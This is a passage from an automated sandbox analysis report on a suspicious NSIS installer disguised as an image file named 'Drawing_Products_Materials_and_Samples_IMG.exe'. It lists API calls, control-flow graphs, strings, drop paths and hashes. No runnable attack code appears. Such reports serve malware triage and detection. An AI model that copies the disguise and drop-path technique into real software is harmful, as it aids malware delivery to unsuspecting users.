                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: Grundsprogs.but
                                                                                      • API String ID: 2295610775-3503724756
                                                                                      • Opcode ID: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                                                                      • Instruction ID: 6833435bd7c55ba6949cdbc3f534d3e11c9bb8cd8424a8444c2420f5768f04fc
                                                                                      • Opcode Fuzzy Hash: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                                                                      • Instruction Fuzzy Hash: E2D012719494205BC7441738ED0C8AF7A59DB5A3317204F32B4A9F12E0C3389D628AE9
                                                                                      Function 00405EA7 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,00403134,?), ref: 00405EB9
                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00403134,?), ref: 00405EC4
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                      • String ID:
                                                                                      • API String ID: 310444273-0
                                                                                      • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                                                                      • Instruction ID: 12aa124b33c0948ddb41e5fcbe9811a0bcf46c48a2c09d507a8af2750e30391c
                                                                                      • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                                                                      • Instruction Fuzzy Hash: BAE08C32A04611ABC6219B209E0896B77ACEA88A41301497EF945F6151D734AC119BBA
                                                                                      Function 004039B9 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 165 4039b9-4039cb 166 4039d1-4039d7 165->166 167 403b0c-403b1b 165->167 166->167 168 4039dd-4039e6 166->168 169 403b6a-403b7f 167->169 170 403b1d-403b65 GetDlgItem * 2 call 403e8c SetClassLongA call 40140b 167->170 171 4039e8-4039f5 SetWindowPos 168->171 172 4039fb-4039fe 168->172 174 403b81-403b84 169->174 175 403bbf-403bc4 call 403ed8 169->175 170->169 171->172 176 403a00-403a12 ShowWindow 172->176 177 403a18-403a1e 172->177 179 403b86-403b91 call 401389 174->179 180 403bb7-403bb9 174->180 182 403bc9-403be4 175->182 176->177 183 403a20-403a35 DestroyWindow 177->183 184 403a3a-403a3d 177->184 179->180 202 403b93-403bb2 SendMessageA 179->202 180->175 187 403e59 180->187 188 403be6-403be8 call 40140b 182->188 189 403bed-403bf3 182->189 191 403e36-403e3c 183->191 193 403a50-403a56 184->193 194 403a3f-403a4b SetWindowLongA 184->194 190 403e5b-403e62 187->190 188->189 198 403e17-403e30 DestroyWindow EndDialog 189->198 199 403bf9-403c04 189->199 191->187 196 403e3e-403e44 191->196 200 403af9-403b07 call 403ef3 193->200 201 403a5c-403a6d GetDlgItem 193->201 194->190 196->187 203 403e46-403e4f ShowWindow 196->203 198->191 199->198 204 403c0a-403c57 call 405b9e call 403e8c * 3 GetDlgItem 199->204 200->190 205 403a8c-403a8f 201->205 206 403a6f-403a86 SendMessageA IsWindowEnabled 201->206 202->190 203->187 235 403c61-403c9d ShowWindow KiUserCallbackDispatcher call 403eae EnableWindow 204->235 236 403c59-403c5e 204->236 210 403a91-403a92 205->210 211 403a94-403a97 205->211 206->187 206->205 213 403ac2-403ac7 call 403e65 210->213 214 403aa5-403aaa 211->214 215 403a99-403a9f 211->215 213->200 216 403ae0-403af3 SendMessageA 214->216 217 403aac-403ab2 214->217 215->216 220 403aa1-403aa3 215->220 216->200 221 403ab4-403aba call 40140b 217->221 222 403ac9-403ad2 call 40140b 217->222 220->213 231 403ac0 221->231 222->200 232 403ad4-403ade 222->232 231->213 232->231 239 403ca2 235->239 240 403c9f-403ca0 235->240 236->235 241 403ca4-403cd2 GetSystemMenu EnableMenuItem SendMessageA 239->241 240->241 242 403cd4-403ce5 SendMessageA 241->242 243 403ce7 241->243 244 403ced-403d26 call 403ec1 call 405b7c lstrlenA call 405b9e SetWindowTextA call 401389 242->244 243->244 244->182 253 403d2c-403d2e 244->253 253->182 254 403d34-403d38 253->254 255 403d57-403d6b DestroyWindow 254->255 256 403d3a-403d40 254->256 255->191 258 403d71-403d9e CreateDialogParamA 255->258 256->187 257 403d46-403d4c 256->257 257->182 259 403d52 257->259 258->191 260 403da4-403dfb call 403e8c GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 258->260 259->187 260->187 265 403dfd-403e10 ShowWindow call 403ed8 260->265 267 403e15 265->267 267->191
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F5
                                                                                      • ShowWindow.USER32(?), ref: 00403A12
                                                                                      • DestroyWindow.USER32 ref: 00403A26
                                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A42
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403A63
                                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A77
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403A7E
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403B2C
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403B36
                                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403B50
                                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BA1
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403C47
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403C68
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C7A
                                                                                      • EnableWindow.USER32(?,?), ref: 00403C95
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CAB
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403CB2
                                                                                      • SendMessageA.USER32(?,?,00000000,00000001), ref: 00403CCA
                                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CDD
                                                                                      • lstrlenA.KERNEL32(Unnarcotic33 Setup: Installing,?,Unnarcotic33 Setup: Installing,007A1F00), ref: 00403D06
                                                                                      • SetWindowTextA.USER32(?,Unnarcotic33 Setup: Installing), ref: 00403D15
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403E49
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 3282139019-3016879369
                                                                                      • Opcode ID: 6d8ad34e300cf5008380b3153d116323a5e10cdd91790160abe8f1fa8dda5f0d
                                                                                      • Instruction ID: e60f831e91f574596bba605afa47ae8b2d4b4441763b235232076e0cc55ea590
                                                                                      • Opcode Fuzzy Hash: 6d8ad34e300cf5008380b3153d116323a5e10cdd91790160abe8f1fa8dda5f0d
                                                                                      • Instruction Fuzzy Hash: FBC1C271904200BBEB21AF61ED45E2B3EACFB46706F04453EF641B11E1C77DA9429B6E
                                                                                      Function 00403627 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 268 403627-40363f call 405ea7 271 403641-403651 call 405ada 268->271 272 403653-403684 call 405a63 268->272 281 4036a7-4036d0 call 4038ec call 405717 271->281 277 403686-403697 call 405a63 272->277 278 40369c-4036a2 lstrcatA 272->278 277->278 278->281 286 4036d6-4036db 281->286 287 403757-40375f call 405717 281->287 286->287 288 4036dd-403701 call 405a63 286->288 293 403761-403768 call 405b9e 287->293 294 40376d-403792 LoadImageA 287->294 288->287 295 403703-403705 288->295 293->294 297 403813-40381b call 40140b 294->297 298 403794-4037c4 RegisterClassA 294->298 299 403716-403722 lstrlenA 295->299 300 403707-403714 call 405654 295->300 311 403825-403830 call 4038ec 297->311 312 40381d-403820 297->312 301 4038e2 298->301 302 4037ca-40380e SystemParametersInfoA CreateWindowExA 298->302 306 403724-403732 lstrcmpiA 299->306 307 40374a-403752 call 405629 call 405b7c 299->307 300->299 304 4038e4-4038eb 301->304 302->297 306->307 310 403734-40373e GetFileAttributesA 306->310 307->287 315 403740-403742 310->315 316 403744-403745 call 405670 310->316 321 403836-403853 ShowWindow LoadLibraryA 311->321 322 4038b9-4038ba call 404f5b 311->322 312->304 315->307 315->316 316->307 323 403855-40385a LoadLibraryA 321->323 324 40385c-40386e GetClassInfoA 321->324 328 4038bf-4038c1 322->328 323->324 326 403870-403880 GetClassInfoA RegisterClassA 324->326 327 403886-4038a9 DialogBoxParamA call 40140b 324->327 326->327 333 4038ae-4038b7 call 403577 327->333 330 4038c3-4038c9 328->330 331 4038db-4038dd call 40140b 328->331 330->312 334 4038cf-4038d6 call 40140b 330->334 331->301 333->304 334->312
                                                                                      APIs
                                                                                        • Part of subcall function 00405EA7: GetModuleHandleA.KERNEL32(?,?,?,00403134,?), ref: 00405EB9
                                                                                        • Part of subcall function 00405EA7: LoadLibraryA.KERNELBASE(?,?,?,00403134,?), ref: 00405EC4
                                                                                        • Part of subcall function 00405EA7: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                                                      • lstrcatA.KERNEL32(1033,Unnarcotic33 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Unnarcotic33 Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\,773E3410,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000000), ref: 004036A2
                                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid,1033,Unnarcotic33 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Unnarcotic33 Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403717
                                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 0040372A
                                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 00403735
                                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid), ref: 0040377E
                                                                                        • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                                                      • RegisterClassA.USER32(007A1EA0), ref: 004037BB
                                                                                      • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 004037D3
                                                                                      • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403808
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 0040383E
                                                                                      • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040384F
                                                                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 0040385A
                                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 0040386A
                                                                                      • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403877
                                                                                      • RegisterClassA.USER32(007A1EA0), ref: 00403880
                                                                                      • DialogBoxParamA.USER32(?,00000000,004039B9,00000000), ref: 0040389F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Unnarcotic33 Setup: Installing$_Nb
                                                                                      • API String ID: 914957316-178227565
                                                                                      • Opcode ID: dc7206f8326d23eec4fcbdc0fea1e05ba2c42fac82f34ab169e21e38d3f74469
                                                                                      • Instruction ID: 5a8f3a480c3ff0a7316bfe3ed3e84a823a8107e4b5d9873dcf131b1b59b1fd9f
                                                                                      • Opcode Fuzzy Hash: dc7206f8326d23eec4fcbdc0fea1e05ba2c42fac82f34ab169e21e38d3f74469
                                                                                      • Instruction Fuzzy Hash: E761D5715442406EE710BB659C85F373AACD78575AF00857EFA05B22E2C67DAD018A2D
                                                                                      Function 00402C33 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 339 402c33-402c81 GetTickCount GetModuleFileNameA call 40582a 342 402c83-402c88 339->342 343 402c8d-402cbb call 405b7c call 405670 call 405b7c GetFileSize 339->343 344 402e65-402e69 342->344 351 402cc1 343->351 352 402da8-402db6 call 402bcf 343->352 354 402cc6-402cdd 351->354 359 402db8-402dbb 352->359 360 402e0b-402e10 352->360 355 402ce1-402ce3 call 403072 354->355 356 402cdf 354->356 361 402ce8-402cea 355->361 356->355 362 402dbd-402dce call 4030a4 call 403072 359->362 363 402ddf-402e09 GlobalAlloc call 4030a4 call 402e6c 359->363 360->344 365 402cf0-402cf7 361->365 366 402e12-402e1a call 402bcf 361->366 379 402dd3-402dd5 362->379 363->360 390 402e1c-402e2d 363->390 369 402d73-402d77 365->369 370 402cf9-402d0d call 4057e5 365->370 366->360 374 402d81-402d87 369->374 375 402d79-402d80 call 402bcf 369->375 370->374 388 402d0f-402d16 370->388 381 402d96-402da0 374->381 382 402d89-402d93 call 405f19 374->382 375->374 379->360 385 402dd7-402ddd 379->385 381->354 389 402da6 381->389 382->381 385->360 385->363 388->374 392 402d18-402d1f 388->392 389->352 393 402e35-402e3a 390->393 394 402e2f 390->394 392->374 396 402d21-402d28 392->396 395 402e3b-402e41 393->395 394->393 395->395 397 402e43-402e5e SetFilePointer call 4057e5 395->397 396->374 398 402d2a-402d31 396->398 401 402e63 397->401 398->374 400 402d33-402d53 398->400 400->360 402 402d59-402d5d 400->402 401->344 403 402d65-402d6d 402->403 404 402d5f-402d63 402->404 403->374 405 402d6f-402d71 403->405 404->389 404->403 405->374
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402C44
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,00000400), ref: 00402C60
                                                                                        • Part of subcall function 0040582A: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 0040582E
                                                                                        • Part of subcall function 0040582A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 00402CAC
                                                                                      Strings
                                                                                      • Null, xrefs: 00402D2A
                                                                                      • soft, xrefs: 00402D21
                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                                                                      • C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                                      • Inst, xrefs: 00402D18
                                                                                      • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                                                                      • Error launching installer, xrefs: 00402C83
                                                                                      • "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe", xrefs: 00402C33
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                      • API String ID: 4283519449-3569344066
                                                                                      • Opcode ID: 29234429f16db235ec7e4964410a2920a6584f8896d7f8ce12431abf0ce67768
                                                                                      • Instruction ID: 67f90bf762a0a8549ff8da05f1705a54a2dc0587b06dee9d11c49c0032f29009
                                                                                      • Opcode Fuzzy Hash: 29234429f16db235ec7e4964410a2920a6584f8896d7f8ce12431abf0ce67768
                                                                                      • Instruction Fuzzy Hash: 18510671D00204ABDB209F65DE89B6E7BA8EF44314F14403BFA04B62D1C7BC9E418BAD
                                                                                      Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 537 40173f-401762 call 402a07 call 405696 542 401764-40176a call 405b7c 537->542 543 40176c-40177e call 405b7c call 405629 lstrcatA 537->543 549 401783-401789 call 405de7 542->549 543->549 553 40178e-401792 549->553 554 401794-40179e call 405e80 553->554 555 4017c5-4017c8 553->555 563 4017b0-4017c2 554->563 564 4017a0-4017ae CompareFileTime 554->564 557 4017d0-4017ec call 40582a 555->557 558 4017ca-4017cb call 405805 555->558 565 401864-40188d call 404e89 call 402e6c 557->565 566 4017ee-4017f1 557->566 558->557 563->555 564->563 580 401895-4018a1 SetFileTime 565->580 581 40188f-401893 565->581 567 4017f3-401835 call 405b7c * 2 call 405b9e call 405b7c call 4053ad 566->567 568 401846-401850 call 404e89 566->568 567->553 601 40183b-40183c 567->601 578 401859-40185f 568->578 582 4028a5 578->582 584 4018a7-4018b2 CloseHandle 580->584 581->580 581->584 585 4028a7-4028ab 582->585 587 4018b8-4018bb 584->587 588 40289c-40289f 584->588 589 4018d0-4018d3 call 405b9e 587->589 590 4018bd-4018ce call 405b9e lstrcatA 587->590 588->582 596 4018d8-402229 call 4053ad 589->596 590->596 596->585 601->578 602 40183e-40183f 601->602 602->568
                                                                                      APIs
                                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging,00000000,00000000,00000031), ref: 0040177E
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging,00000000,00000000,00000031), ref: 004017A8
                                                                                        • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                        • Part of subcall function 00404E89: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                        • Part of subcall function 00404E89: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
